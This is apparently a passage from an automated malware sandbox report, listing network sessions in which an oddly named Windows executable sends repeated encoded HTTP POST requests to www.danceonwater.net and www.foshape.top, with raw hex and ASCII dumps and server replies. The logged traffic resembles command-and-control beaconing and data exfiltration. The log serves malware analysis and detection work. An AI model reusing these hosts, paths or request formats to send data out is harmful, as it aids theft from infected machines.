                                                                                                Data Raw: 53 36 67 30 69 36 31 3d 4e 53 50 6b 75 72 58 74 41 4d 4b 34 49 4b 55 6a 37 2b 4d 71 38 34 59 4d 51 6e 57 35 50 72 33 65 35 66 51 44 58 31 66 39 43 4b 6b 32 7a 6a 46 73 31 44 4d 6a 73 6d 62 79 51 52 65 4c 68 31 61 53 63 47 75 53 6e 2f 71 6a 52 70 77 35 44 68 4a 56 71 37 52 33 79 4c 69 30 77 4f 56 34 43 74 41 6c 69 73 62 42 62 46 4c 55 4d 76 6f 62 37 52 50 45 2b 5a 47 33 36 6b 68 72 6b 44 48 35 36 47 35 4b 33 5a 5a 62 58 4f 36 65 48 64 55 64 50 41 68 34 43 48 6c 46 49 2f 58 35 4d 41 61 2b 6d 57 46 33 78 56 63 43 78 33 68 64 70 49 78 43 4e 4b 51 32 6e 74 52 66 63 4b 66 78 32 79 36 4f 56 4a 68 6c 51 45 72 6d 6c 48 50 32 7a 57 52 5a 58 2b 42 79 38 58 52 66 48 33 6d 6a 59 44 2f 30 73 62 63 4f 45 76 61 63 59 4b 4d 53 6a 74 64 31 71 53 73 76 32 47 74 4c 4a 7a 78 72 41 4e 4d 66 73 73 33 30 71 4e 6d 64 52 37 5a 37 78 4e 58 75 72 4d 52 6b 78 30 50 51 76 58 32 41 65 68 67 63 65 69 54 79 72 69 50 38 68 61 50 37 37 72 36 49 65 6c 33 4d 68 5a 4c 59 49 59 39 58 58 44 30 47 65 4f 70 55 34 31 4d 36 52 65 72 45 54 6c [TRUNCATED]
                                                                                                Data Ascii: S6g0i61=NSPkurXtAMK4IKUj7+Mq84YMQnW5Pr3e5fQDX1f9CKk2zjFs1DMjsmbyQReLh1aScGuSn/qjRpw5DhJVq7R3yLi0wOV4CtAlisbBbFLUMvob7RPE+ZG36khrkDH56G5K3ZZbXO6eHdUdPAh4CHlFI/X5MAa+mWF3xVcCx3hdpIxCNKQ2ntRfcKfx2y6OVJhlQErmlHP2zWRZX+By8XRfH3mjYD/0sbcOEvacYKMSjtd1qSsv2GtLJzxrANMfss30qNmdR7Z7xNXurMRkx0PQvX2AehgceiTyriP8haP77r6Iel3MhZLYIY9XXD0GeOpU41M6RerETlXp2luwJsHlEaiexLUkz8TcJUaXnYICaibYjvClgfTpwRh9t5Y9t8W11b0bQmuByBYgwy7SMbJLRPAE16zJWRkUrmILNoMrnzlzKx4GGYpaspdIOQA1EMPWlbaAo++e08AV9aUVC2fV4XLirqo1bO4ADI2en0h9kcJCC39qGObuSFnf0hngYeHBrY1UEWjFNkgvgcKxjBMjheBje3cFqVpIlVnvaB8Sb1/VWwMR0egbnaPerHrwq+ktlflhMTuVscBQqTYsAiUSE4preE45KfGmX8QyPz/L1F7TlXqhHchtEHULv4uwWvQYhOnUWlZxLtfK1PTr79BtntjeRC6x//DmjoWxvvsCm1waRRJ0bQEkWptzSWTdqqU2eQxqeh88ryAOp7VsUxZ58HqoBJAoK7VUWjbu6zmsIN8qkiJSatFrP50ZYcmRgJBwg8vURJIlkFdrXpyF6dS+g1/3wUI6ps/QFCSUMiCzMdLeCFaM4nZ6if8996cJRRwldp8rNp4qBXnZHcfaqo6djAcH1D7rFhsGC+NLJ1GyklJrr9soLpI82E2XXJNUoxxo7TwTOmJ2kniZMtvz8i2xEt7XzSmq2dI3yLJ1g4dhXMgWxdW2pAJ298U9TYIjjT3d7es6lfiNJjtHhwvUI/7WZcioF0zR9lJPZhRsEdYD7n7P [TRUNCATED]
                                                                                                Nov 11, 2024 10:04:44.862759113 CET162OUTData Raw: 36 63 37 74 66 45 4c 71 2f 31 42 4c 52 30 57 56 62 6f 75 35 39 34 51 52 38 30 6f 4a 2f 62 6a 38 59 2b 66 50 51 6f 33 77 63 33 76 4b 73 6c 53 56 34 70 2b 4a 63 65 4a 4a 4f 76 32 42 53 62 31 5a 34 48 6c 69 55 61 42 51 34 63 51 63 7a 43 52 7a 35 56
                                                                                                Data Ascii: 6c7tfELq/1BLR0WVbou594QR80oJ/bj8Y+fPQo3wc3vKslSV4p+JceJJOv2BSb1Z4HliUaBQ4cQczCRz5VzJPsGrNbuBE3dutzOUUeUi5XEQ+Cs4VuLiE4bVMu1y89IJzdU41cnEFpgf0eblqjhy38KHyPHwOvS0TP


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                3192.168.2.2249165208.91.197.27802184C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 10:04:47.428039074 CET673OUTPOST /bbvc/ HTTP/1.1
                                                                                                Host: www.danceonwater.net
                                                                                                Accept: */*
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Origin: http://www.danceonwater.net
                                                                                                Referer: http://www.danceonwater.net/bbvc/
                                                                                                Content-Length: 204
                                                                                                Cache-Control: no-cache
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
                                                                                                Data Raw: 53 36 67 30 69 36 31 3d 4e 53 50 6b 75 72 58 74 41 4d 4b 34 49 4e 67 6a 39 71 51 71 38 59 59 4d 54 6e 57 35 42 4c 33 59 35 66 4d 68 58 30 62 74 43 37 73 32 7a 78 64 73 31 57 59 6a 76 6d 62 39 66 78 65 50 38 6c 62 47 63 47 76 37 6e 36 43 6a 52 70 6b 35 52 79 78 56 6f 36 52 77 75 72 69 32 32 4f 56 39 43 74 4d 57 69 73 58 76 62 47 4c 55 4d 74 73 62 36 52 66 45 37 37 65 33 77 30 68 74 6d 44 47 6a 36 47 30 43 33 61 77 57 58 50 47 65 47 73 59 64 4d 52 42 34 49 32 6c 46 43 66 58 34 4f 77 62 72 6f 55 67 62 2b 30 45 76 34 46 52 44 75 70 63 6e 4b 5a 35 31 75 65 41 65 63 59 66 6c 39 45 7a 4f 57 61 77 78 47 41 3d 3d
                                                                                                Data Ascii: S6g0i61=NSPkurXtAMK4INgj9qQq8YYMTnW5BL3Y5fMhX0btC7s2zxds1WYjvmb9fxeP8lbGcGv7n6CjRpk5RyxVo6Rwuri22OV9CtMWisXvbGLUMtsb6RfE77e3w0htmDGj6G0C3awWXPGeGsYdMRB4I2lFCfX4OwbroUgb+0Ev4FRDupcnKZ51ueAecYfl9EzOWawxGA==


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                4192.168.2.2249166208.91.197.27802184C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 10:04:49.976736069 CET2472OUTPOST /bbvc/ HTTP/1.1
                                                                                                Host: www.danceonwater.net
                                                                                                Accept: */*
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Origin: http://www.danceonwater.net
                                                                                                Referer: http://www.danceonwater.net/bbvc/
                                                                                                Content-Length: 3628
                                                                                                Cache-Control: no-cache
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
                                                                                                Data Raw: 53 36 67 30 69 36 31 3d 4e 53 50 6b 75 72 58 74 41 4d 4b 34 4c 74 77 6a 2f 4e 6b 71 72 49 59 54 63 48 57 35 50 72 33 63 35 66 51 68 58 31 66 39 43 49 41 32 7a 67 4e 73 31 7a 4d 6a 69 47 62 39 5a 78 65 4c 68 31 61 64 63 47 4c 5a 6e 2f 75 56 52 76 38 35 44 6b 70 56 71 34 35 33 6b 37 69 30 39 75 56 36 43 74 4d 66 69 73 48 7a 62 47 50 71 4d 74 45 62 35 6a 48 45 72 4c 65 77 7a 30 68 74 6d 44 47 6e 36 47 31 5a 33 61 35 4c 58 4b 71 30 48 66 41 64 50 77 68 34 45 33 6c 47 4b 2f 58 38 47 51 61 6b 6d 57 35 4b 78 56 63 47 78 7a 4a 37 70 4a 4e 43 50 59 6f 32 6e 73 52 65 54 36 66 32 79 79 36 4f 59 70 68 72 51 45 72 36 6c 48 50 32 7a 58 74 5a 57 75 42 79 38 57 52 65 61 6e 6d 6a 47 54 2f 31 69 37 51 38 45 72 7a 39 59 4c 38 43 6a 65 78 31 72 55 59 76 6e 47 74 4c 4c 44 78 74 41 4e 4d 59 32 63 33 43 71 4c 50 6f 52 34 68 72 78 4e 58 75 72 4f 5a 6b 6e 6d 6e 51 35 58 32 41 52 42 67 5a 55 43 54 78 72 69 62 37 68 61 37 37 37 75 65 49 64 79 62 4d 6f 37 54 62 41 49 39 57 41 54 30 45 61 4f 70 42 34 78 73 51 52 65 6a 75 54 6c [TRUNCATED]
                                                                                                Data Ascii: S6g0i61=NSPkurXtAMK4Ltwj/NkqrIYTcHW5Pr3c5fQhX1f9CIA2zgNs1zMjiGb9ZxeLh1adcGLZn/uVRv85DkpVq453k7i09uV6CtMfisHzbGPqMtEb5jHErLewz0htmDGn6G1Z3a5LXKq0HfAdPwh4E3lGK/X8GQakmW5KxVcGxzJ7pJNCPYo2nsReT6f2yy6OYphrQEr6lHP2zXtZWuBy8WReanmjGT/1i7Q8Erz9YL8Cjex1rUYvnGtLLDxtANMY2c3CqLPoR4hrxNXurOZknmnQ5X2ARBgZUCTxrib7ha777ueIdybMo7TbAI9WAT0EaOpB4xsQRejuTlHp2jawFuvlEKiZ4rU4lMfIJUStnYNgakLYi7ul3trq0hh3mZY36sXE1bxXQmOByQQg/RDSbcVIX/BCj6yfBBkArl1YNpc7nBNzFh4GH+9ZgZdJRwAdOsOIlbb3o/fj1N4V9Z8VCkHV4XKQuqo3Qul6DIqan09tkalCbEVqGL3uK1nfuxnjW+G8rYxuES6nMQwvg/CxlDkjwOBhSXcE1Fp/lV3vaFlXb0nVWV4Ry/gb56Pa13qoq+kLlfouMT/uselQqX0sGjUSfIpuYE49H/HSX8ZqP3+k1ADTk3KhFthtLHUJyouwYPQAhOvEWncELsXK1+jr5dBildjdTC621fCrjoGxvvoCmzIaRgJ0NxEke5txWWT9hKQaeTJIegIsrxUOou5sVzx4gnquQ5BGO7UzWjbY6xW8I/0qkwBSd4poMZ0aBMnZvpBcg8+7RNcLl25rXpiF6Oq+hF/3wUI5ps/UFFa+MjyVMdLeNwuM4Ux6p/88/6dVVRwSdpIRNqJFBRTZHOXaqo6auQcE8j7qFhghC+N1J1KykXFrrukoLP08wk2XGJNLjRxp7TxOOj5YkmiZNdPzvUiwHd7WnimG89V3yLE2g6RhX+0WwMW2pwJ2jMU6LoI6tz7B7ewcleydJydHgB/UO+7XCcipLUzX9iA/Zhp0Edh87gXP [TRUNCATED]
                                                                                                Nov 11, 2024 10:04:49.981666088 CET1626OUTData Raw: 75 63 36 65 6e 45 5a 6f 58 31 4b 4c 52 33 63 31 62 66 75 35 67 32 51 58 63 43 6f 4c 4b 54 6a 4f 38 2b 4e 50 51 6f 67 43 30 32 35 36 74 67 52 56 34 30 2b 4a 63 36 4a 4a 47 30 32 45 71 4c 31 62 49 48 6c 67 38 61 42 67 34 66 45 63 7a 45 63 54 34 41
                                                                                                Data Ascii: uc6enEZoX1KLR3c1bfu5g2QXcCoLKTjO8+NPQogC0256tgRV40+Jc6JJG02EqL1bIHlg8aBg4fEczEcT4AzJTJGrV5uFo3dvRzBUEeCy5XGQ+NwIV3Uy4/bVh4tl0Nfvu4f6pZuF1ohZsMd0uiiQ38BFebTGy1Zim6H4jqogtavViFH0X71e9mIlRlL8LCAomUfJiTJss0f5VNmWYsZ2xXlXJinD00L+MZAXIVfZTvHa6BGzdvS


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                5192.168.2.2249167208.91.197.27802184C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 10:04:52.514759064 CET412OUTGET /bbvc/?S6g0i61=AQnEtdfnecn/cJt9i/023LRQegDiN6HYsPciUFTRW5IBsDtKgzQsjW78chH883+eUHibxbeZVIJMdiRQvr4KlK/99b81DewKuJLGdX/rY9gS0DqA57O/0mcrhkmt&2Z94P=LzK44tdp_JPt28wP HTTP/1.1
                                                                                                Host: www.danceonwater.net
                                                                                                Accept: */*
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
                                                                                                Nov 11, 2024 10:04:53.286149025 CET1236INHTTP/1.1 200 OK
                                                                                                Date: Mon, 11 Nov 2024 09:04:52 GMT
                                                                                                Server: Apache
                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                Set-Cookie: vsid=907vr4788614930314091; expires=Sat, 10-Nov-2029 09:04:53 GMT; Max-Age=157680000; path=/; domain=www.danceonwater.net; HttpOnly
                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_aFJzrTqZzOJ2ieM5Vdg9kjncfXjEx8N2nPImX3SfQiXAGEsSgr1X07woOsK12A7OUEuxcgBIJrws3+8z3Qtdog==
                                                                                                Content-Length: 2620
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Connection: close
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 61 46 4a 7a 72 54 71 5a 7a 4f 4a 32 69 65 4d 35 56 64 67 39 6b 6a 6e 63 66 58 6a 45 78 38 4e 32 6e 50 49 6d 58 33 53 66 51 69 58 41 47 45 73 53 67 72 31 58 30 37 77 6f 4f 73 4b 31 32 41 37 4f 55 45 75 78 63 67 42 49 4a 72 77 73 33 2b
                                                                                                Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_aFJzrTqZzOJ2ieM5Vdg9kjncfXjEx8N2nPImX3SfQiXAGEsSgr1X07woOsK12A7OUEuxcgBIJrws3+
                                                                                                Nov 11, 2024 10:04:53.286170006 CET1236INData Raw: 38 7a 33 51 74 64 6f 67 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65
                                                                                                Data Ascii: 8z3Qtdog=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.danceonwater.net/px.js?ch=1"></script><script type="text/javascript" src="http://www.danceonwater.net/px.js?ch=2"></script><sc
                                                                                                Nov 11, 2024 10:04:53.286184072 CET424INData Raw: 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45
                                                                                                Data Ascii: content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=de
                                                                                                Nov 11, 2024 10:04:53.286314964 CET713INData Raw: 69 74 65 28 0d 0a 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 27 0d 0a 20 20 20 20 20 20 20 20 2b 20 27 73
                                                                                                Data Ascii: ite( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.location.host + '/' + 'Skenzor7' + '/park.js?reg_logo=netsol-logo.png&amp;reg_href_text=This+


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                6192.168.2.2249168206.238.184.166802184C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 10:04:58.721899986 CET2472OUTPOST /1pj2/ HTTP/1.1
                                                                                                Host: www.foshape.top
                                                                                                Accept: */*
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Origin: http://www.foshape.top
                                                                                                Referer: http://www.foshape.top/1pj2/
                                                                                                Content-Length: 2164
                                                                                                Cache-Control: no-cache
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
                                                                                                Data Raw: 53 36 67 30 69 36 31 3d 64 2f 76 67 44 75 73 39 44 61 33 34 4a 75 4f 31 67 51 61 66 57 6d 5a 53 58 4b 37 62 55 56 69 6a 4a 46 61 48 57 63 5a 4e 56 32 74 55 65 58 45 63 75 49 31 4e 66 52 42 30 34 74 79 39 6b 63 6b 66 2b 38 4a 6f 45 4b 78 73 77 53 49 62 4a 65 69 72 30 57 46 76 49 34 4a 75 42 6e 57 71 4d 72 72 51 33 43 75 69 7a 76 6d 42 4c 34 58 30 45 43 66 64 78 35 4c 6e 36 42 2f 6e 77 6f 38 61 74 45 49 44 6f 38 53 6e 48 68 65 41 47 6a 4a 67 6a 6b 4f 4b 57 45 32 75 57 43 34 76 36 55 39 4c 5a 66 48 51 77 72 6b 58 6c 71 63 71 79 53 45 51 37 33 62 43 33 62 50 6e 38 4c 54 7a 4f 51 49 6f 68 56 36 30 32 49 38 37 42 79 79 53 6f 52 73 77 2f 77 52 34 64 72 46 66 67 31 48 61 41 34 38 44 35 65 4e 51 77 49 53 66 39 76 58 62 67 63 66 4d 76 4a 75 49 7a 6c 7a 6a 6f 66 62 74 74 72 77 69 57 54 77 41 50 37 55 49 43 51 74 7a 72 6b 55 39 77 6f 4a 6a 76 39 59 70 5a 62 4a 6f 59 78 4e 37 2b 53 55 4f 6d 43 42 4a 52 30 65 37 75 73 4b 59 76 72 50 50 35 73 67 65 47 52 56 55 49 48 2b 61 37 31 43 50 6e 61 75 77 31 48 59 34 72 66 [TRUNCATED]
                                                                                                Data Ascii: S6g0i61=d/vgDus9Da34JuO1gQafWmZSXK7bUVijJFaHWcZNV2tUeXEcuI1NfRB04ty9kckf+8JoEKxswSIbJeir0WFvI4JuBnWqMrrQ3CuizvmBL4X0ECfdx5Ln6B/nwo8atEIDo8SnHheAGjJgjkOKWE2uWC4v6U9LZfHQwrkXlqcqySEQ73bC3bPn8LTzOQIohV602I87ByySoRsw/wR4drFfg1HaA48D5eNQwISf9vXbgcfMvJuIzlzjofbttrwiWTwAP7UICQtzrkU9woJjv9YpZbJoYxN7+SUOmCBJR0e7usKYvrPP5sgeGRVUIH+a71CPnauw1HY4rf+9SlmMSUTwzSpi+TOMCn0oKO92bsxoPLavmjsUR3rYZZxxFk9nK0SnNGkFyKXkJFj7hI/mIuCR4AHPDsKWmvzsSrDQSxzCymeMcQT7xPHxG/rTFWOGOyB3PLYlUPV5VFaZrbpcHLk7KvNV2PxfBS8sU6STc+2U9t24ObLE0gu+4D4MqMP8JEyrVSMxuj45BOzI9xBFBamk5CuRA0DyVixVc/vlPd6/ppjlYe7L8UdH8BtWueicKkMTiIYapkeTb2CmqrRw7pGUTwGLu06Y+dcR79crE6ESmiTruT/J+ZomcU/Ghyb+6+lKEvn0eodws5BV2mu0tmVwpypqaKdkwxUSo8fgQJF0O5ZOw9YVQ7lA4yrY3SLSBewEQG4K77K9oVHSl+GijiBT7RGptHegi26yqEQB/9cqSGf9azTmab/IwClC6HPckIs/pMXG0wXkUA33o8NUk7UvV9MGXmALG7wITOGL7B4FJXzfhrrpQbGwJazsmVdBlFyYAv/d16wndKkZGalzTAaXsPa1ygWsCoFhl8Z51uge7CxDi0XWnhT/rn2ulLsCwZFd1NDqiZJBrTKY6gaLOFzRsnn2fVZnSIjXoPFMBGJ+spLYOl4yyoiwU/gtK//cP6s5goGY44A0UG4jktGaiYUq2ld63Av5vkmWg2oXpe1IaEEn [TRUNCATED]
                                                                                                Nov 11, 2024 10:04:58.727087975 CET147OUTData Raw: 69 32 62 2f 65 34 47 59 56 6f 76 6a 65 63 4a 78 38 74 74 54 4c 55 50 78 63 52 7a 65 57 6e 42 75 76 6e 49 71 55 34 35 56 6e 7a 44 78 4b 4f 47 77 2f 59 76 72 5a 78 33 41 5a 57 61 4b 75 62 39 4d 6c 32 32 59 36 7a 56 61 4e 41 30 7a 4f 72 4f 41 64 47
                                                                                                Data Ascii: i2b/e4GYVovjecJx8ttTLUPxcRzeWnBuvnIqU45VnzDxKOGw/YvrZx3AZWaKub9Ml22Y6zVaNA0zOrOAdGmegqPaW/d5qM33CLXU+Nm2ARWhlvcEzkq5xaCsgSFwITL91r1YFt4FLt8WCCtn6w7
                                                                                                Nov 11, 2024 10:04:59.499281883 CET398INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 09:04:59 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Content-Encoding: gzip
                                                                                                Data Raw: 63 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d cc cd 0a 82 40 18 85 e1 bd 57 21 b3 a9 20 bf 51 2b 90 52 41 ac 16 31 10 91 2d 6a 13 36 2a 7e fe 8c 32 33 e0 22 ba f7 82 a2 4d ed ce 7b 16 8f af b8 c4 5e 9b bc 4c a5 ca 75 40 4e c9 d6 f2 88 89 59 40 58 74 8d f7 8c 6d e2 84 98 4a f2 80 50 aa b2 1a 16 0e 34 29 ad 94 f5 0a ab 97 1d b4 28 a0 52 24 f4 e9 1b 0b 0d ff 33 58 04 28 50 8f ef 98 2d c9 6c 77 38 bb f9 7c dd 5f 98 7d 3c d6 0b 32 e5 f5 9f f7 31 f9 75 8c 01 45 d6 0d d0 74 3c d5 d8 09 28 65 5e 98 c1 a8 d4 ba 57 4b 4a 6f 85 63 bb a0 9a b4 18 10 b8 a0 33 0f 4a dd 36 a3 95 f1 b5 9e a9 17 1a 1b e9 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: c5m@W! Q+RA1-j6*~23"M{^Lu@NY@XtmJP4)(R$3X(P-lw8|_}<21uEt<(e^WKJoc3J60


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                7192.168.2.2249169206.238.184.166802184C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 10:05:01.254463911 CET658OUTPOST /1pj2/ HTTP/1.1
                                                                                                Host: www.foshape.top
                                                                                                Accept: */*
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Origin: http://www.foshape.top
                                                                                                Referer: http://www.foshape.top/1pj2/
                                                                                                Content-Length: 204
                                                                                                Cache-Control: no-cache
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/43.3.3.185 Chrome/43.0.2357.81 Safari/537.36
                                                                                                Data Raw: 53 36 67 30 69 36 31 3d 64 2f 76 67 44 75 73 39 44 61 33 34 4a 74 6d 31 68 43 69 66 55 47 5a 53 62 71 37 62 4e 46 69 68 4a 46 58 79 57 64 63 49 56 42 5a 55 65 44 41 63 75 36 64 4e 54 78 41 47 74 64 79 78 35 73 6b 4f 2b 38 4a 65 45 50 4a 73 77 53 73 62 49 38 71 72 6a 45 74 67 41 6f 49 49 4a 48 57 70 4d 71 58 7a 33 43 6a 35 7a 75 4f 42 4c 2b 76 30 48 43 50 64 6e 72 54 6e 2f 78 2f 68 34 49 38 42 74 45 31 48 6f 36 79 2f 48 6b 43 41 47 79 56 67 69 77 61 4b 63 31 32 75 59 69 34 69 7a 30 38 56 59 38 2b 55 34 34 63 43 6f 4a 68 46 34 47 4d 74 37 47 48 42 74 4c 37 71 31 49 6a 35 45 6b 78 47 6f 52 54 75 76 67 3d 3d
                                                                                                Data Ascii: S6g0i61=d/vgDus9Da34Jtm1hCifUGZSbq7bNFihJFXyWdcIVBZUeDAcu6dNTxAGtdyx5skO+8JeEPJswSsbI8qrjEtgAoIIJHWpMqXz3Cj5zuOBL+v0HCPdnrTn/x/h4I8BtE1Ho6y/HkCAGyVgiwaKc12uYi4iz08VY8+U44cCoJhF4GMt7GHBtL7q1Ij5EkxGoRTuvg==
                                                                                                Nov 11, 2024 10:05:02.306224108 CET398INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 09:05:01 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Content-Encoding: gzip
                                                                                                Data Raw: 63 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d cc cd 0a 82 40 18 85 e1 bd 57 21 b3 a9 20 bf 51 2b 90 52 41 ac 16 31 10 91 2d 6a 13 36 2a 7e fe 8c 32 33 e0 22 ba f7 82 a2 4d ed ce 7b 16 8f af b8 c4 5e 9b bc 4c a5 ca 75 40 4e c9 d6 f2 88 89 59 40 58 74 8d f7 8c 6d e2 84 98 4a f2 80 50 aa b2 1a 16 0e 34 29 ad 94 f5 0a ab 97 1d b4 28 a0 52 24 f4 e9 1b 0b 0d ff 33 58 04 28 50 8f ef 98 2d c9 6c 77 38 bb f9 7c dd 5f 98 7d 3c d6 0b 32 e5 f5 9f f7 31 f9 75 8c 01 45 d6 0d d0 74 3c d5 d8 09 28 65 5e 98 c1 a8 d4 ba 57 4b 4a 6f 85 63 bb a0 9a b4 18 10 b8 a0 33 0f 4a dd 36 a3 95 f1 b5 9e a9 17 1a 1b e9 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: c5m@W! Q+RA1-j6*~23"M{^Lu@NY@XtmJP4)(R$3X(P-lw8|_}<21uEt<(e^WKJoc3J60


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                8192.168.2.2249170206.238.184.166802184C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 10:05:03.799254894 CET2472OUTPOST /1pj2/ HTTP/1.1
                                                                                                Host: www.foshape.top
                                                                                                Accept: */*
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Origin: http://www.foshape.top
                                                                                                Referer: http://www.foshape.top/1pj2/
                                                                                                Content-Length: 3628
                                                                                                Cache-Control: no-cache
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
